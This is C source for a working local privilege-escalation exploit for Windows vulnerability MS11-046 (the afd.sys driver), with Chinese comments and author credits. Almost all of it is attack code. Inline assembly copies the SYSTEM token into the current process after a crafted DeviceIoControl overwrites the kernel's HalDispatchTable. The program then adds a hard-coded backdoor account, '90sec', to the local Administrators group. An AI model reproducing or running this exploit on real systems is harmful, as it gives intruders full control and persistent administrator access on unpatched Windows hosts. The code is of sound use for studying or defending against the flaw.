*
* 触发MS11-046
* 来源:azy,[url]http://hi.baidu.com/azy0922/blog/item/053065d197cebfca572c8492.html[/url]
* 改编:KiDebug,[email]Google@pku.edu.cn[/email]
* 编译:VC6.0
* 测试环境:原版Windows XP SP3,Windows 2003 SP2,普通用户
*/
USER_INFO_1 ui;
DWORD dwError = 0;
typedef struct _RTL_PROCESS_MODULE_INFORMATION {
HANDLE Section; // Not filled in
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR FullPathName[ 256 ];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;
typedef struct _RTL_PROCESS_MODULES {
ULONG NumberOfModules;
RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;
typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
NtQueryIntervalProfile_ NtQueryIntervalProfile;
NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
NtQuerySystemInformation_ NtQuerySystemInformation;
ULONG PsInitialSystemProcess, PsReferencePrimaryToken, PsGetThreadProcess, WriteToHalDispatchTable;
void _declspec(naked) ShellCode()
{
__asm
{
pushad
pushfd
mov esi,PsReferencePrimaryToken
FindTokenOffset:
lodsb
cmp al, 8Dh;
jnz FindTokenOffset
mov edi,[esi+1]
mov esi,PsInitialSystemProcess
mov esi,[esi]
push fs:[124h]
mov eax,PsGetThreadProcess
call eax
add esi, edi
add edi, eax
movsd
popfd
popad
ret
}
}
void adduser(){
ui.usri1_name = L"90sec";
ui.usri1_password = L"90sec";
ui.usri1_priv = USER_PRIV_USER;
ui.usri1_home_dir = NULL;
ui.usri1_comment = NULL;
ui.usri1_flags = UF_SCRIPT;
ui.usri1_script_path = NULL;
if (NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError)==NERR_Success)
{
printf("[*] User has been successfully added\n");
wchar_t szAccountName[100]={0};
wcscpy(szAccountName,ui.usri1_name);
LOCALGROUP_MEMBERS_INFO_3 account;
account.lgrmi3_domainandname=szAccountName;
if (NetLocalGroupAddMembers(NULL,L"Administrators",3,(LPBYTE)&account,1)==NERR_Success)
{
printf("[*] Add to Administrators success\n");
return ;
}
}
}
void main( )
{
HMODULE ntdll = GetModuleHandle( "ntdll.dll" );
NtQueryIntervalProfile = (NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
NtAllocateVirtualMemory = (NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
NtQuerySystemInformation = ( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );
if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )
return;
//取ntoskrnl的信息,只要调用一次就行
ULONG status, NtoskrnlBase;
RTL_PROCESS_MODULES module;
status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11
if ( status != 0xC0000004 ) //STATUS_INFO_LENGTH_MISMATCH
return;
NtoskrnlBase = (ULONG)module.Modules[0].ImageBase;
//把ntoskrnl.exe加载进来
HMODULE ntoskrnl;
ntoskrnl = LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );
if ( ntoskrnl == NULL )
return;
//计算实际地址
WriteToHalDispatchTable = (ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4 + 2; //需要覆盖的地址
PsInitialSystemProcess = (ULONG)GetProcAddress(ntoskrnl,"PsInitialSystemProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
PsReferencePrimaryToken = (ULONG)GetProcAddress(ntoskrnl,"PsReferencePrimaryToken") - (ULONG)ntoskrnl + NtoskrnlBase;
PsGetThreadProcess = (ULONG)GetProcAddress(ntoskrnl,"PsGetThreadProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
//以下代码就各显神通了
if ( VirtualAlloc( (PVOID)0x02070000, 0x20000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) == NULL )
return;
memset((PVOID)0x02070000,0x90,0x20000);
memcpy((PVOID)0x02080000,ShellCode,100);
WSADATA ws;
SOCKET tcp_socket;
struct sockaddr_in peer;
ULONG dwReturnSize;
WSAStartup(0x0202,&ws);
peer.sin_family = AF_INET;
peer.sin_port = htons(0);
peer.sin_addr.s_addr = inet_addr( "127.0.0.1" );
tcp_socket = socket(AF_INET, SOCK_STREAM, 0);
if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(struct sockaddr_in)) )
{
printf("[>] ms11-046 Exploit\n");
printf("[>] by:Mer4en7y@90sec.org\n");
}
DWORD buf[0x30];
buf[3]=1;
buf[4]=0x20;
if(!DeviceIoControl((HANDLE)tcp_socket,0x12007, (PVOID)buf, 0x60, (PVOID)WriteToHalDispatchTable, 0x0,&dwReturnSize, NULL))
{
printf("[*] Token system command\n");
printf("[*] command add user 90sec 90sec\n");
}
NtQueryIntervalProfile( 2, &status );
adduser();
return;
}
